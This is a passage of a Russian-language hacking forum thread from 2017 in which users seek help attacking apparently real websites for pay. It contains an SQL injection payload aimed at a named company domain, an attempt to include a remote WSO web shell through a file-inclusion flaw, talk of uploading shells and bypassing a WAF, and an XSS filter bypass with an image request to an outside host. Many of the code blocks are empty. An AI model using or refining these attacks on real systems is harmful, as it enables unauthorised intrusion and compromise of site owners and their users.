HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1681  
Старый 28.01.2017, 16:35
foozzione
Guest
Сообщений: n/a
Провел на форуме:
19301

Репутация: 0
По умолчанию

[QUOTE="SaNDER"]
SaNDER said:

Error-Based SQL Injection .
WAF фильтрует concat .
*****.**/news.php?id=1 concat
 
Ответить с цитированием

  #1682  
Старый 28.01.2017, 23:02
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Залить шелл в таких условиях?

Код:
Code:
$uploaddir = "img/news/";
$temp=sha1(uniqid()).".jpg";
$uploadfile = $uploaddir . $temp;
move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);
 
Ответить с цитированием

  #1683  
Старый 29.01.2017, 01:20
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Залить шелл в таких условиях?
Только в фантазиях
 
Ответить с цитированием

  #1684  
Старый 29.01.2017, 02:02
foozzione
Guest
Сообщений: n/a
Провел на форуме:
19301

Репутация: 0
По умолчанию

есть урл, october cms - https://site.ru/blog/post/name_post

там есть скуля, хочу раскрутить через sqlmap, но чистого роута не знаю, есть спецы по octobercms?

нужно знать урл по типу такого https://site.ru/blog.php?post=name_post
 
Ответить с цитированием

  #1685  
Старый 29.01.2017, 03:18
foozzione
Guest
Сообщений: n/a
Провел на форуме:
19301

Репутация: 0
По умолчанию

и еще один вопрос, есть lfi:

Код:
Code:
Warning: file_exists() expects parameter 1 to be a valid path, string given in /var/www/***/***/***.php on line 3170 Не найден файл: site_func/https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php
судя из ошибка пыхи (а пыху знаю 6 лет), в file_exists нельзя пихать строку, требуется файл на сервере, как реализовать? Еще поправка, файлы онли .php подключает.

UPD:

Кстате любой файл исполняется, а не экранируется, конфиги не получить, cms знаю, пути знаю, как извлечь инфу нужную?

Кто поможет раскрутить lfi (url не дам, только варианты пробовать буду), отбрагодарю финансово.

В ЛС могу кинуть уязвимый код на пыхе
 
Ответить с цитированием

  #1686  
Старый 01.02.2017, 18:17
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Где тут вектор атаки что я делаю нетак http://iucosoft.com/software-development-details.html?place=-desktop'+or+union+select+1,2,3+or+''='8
 
Ответить с цитированием

  #1687  
Старый 02.02.2017, 18:05
Elva
Guest
Сообщений: n/a
Провел на форуме:
5299

Репутация: 0
По умолчанию

XSS.

Задача обойти фильтр.

Пропускает исключительно

10$ в BTC за результативную помощь в внедрении кода (ЛС).

Сайт №1.

Отправляю:

Код:
Code:
Получаю:

Код:
Code:
Сайт №2

Отправляю:

Код:
Code:
Получаю

Код:
Code:
 
Ответить с цитированием

  #1688  
Старый 02.02.2017, 19:08
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от Elva  
Elva said:


Синтаксис нарушен img.src = 'https://domen.com/1.gif?', возможно из-за этого парсер ломает структуру. javascript:там не нужен.

Код:
Code:
Во втором похоже на белый список атриббутов, фильтр вроде caja.
 
Ответить с цитированием

  #1689  
Старый 02.02.2017, 19:08
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Где тут вектор атаки что я делаю нетак
http://iucosoft.com/software-development-details.html?place=-desktop'+or+union+select+1,2,3+or+''='8
Прочитай любую вводную стаью про SQL Injection.
 
Ответить с цитированием

  #1690  
Старый 02.02.2017, 19:27
cyrhaller
Guest
Сообщений: n/a
Провел на форуме:
1415

Репутация: 6
По умолчанию

Цитата:
Сообщение от Elva  
Elva said:

XSS.
Задача обойти фильтр.
Пропускает исключительно
10$ в BTC за результативную помощь в внедрении кода (ЛС).
Сайт №1.
Отправляю:
Код:
Code:
Получаю:
Код:
Code:
Сайт №2
Отправляю:
Код:
Code:
Получаю
Код:
Code:
1:

Код:
Code:
со вторым не факт, что получится, он вырезает лишние параметры из тега
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ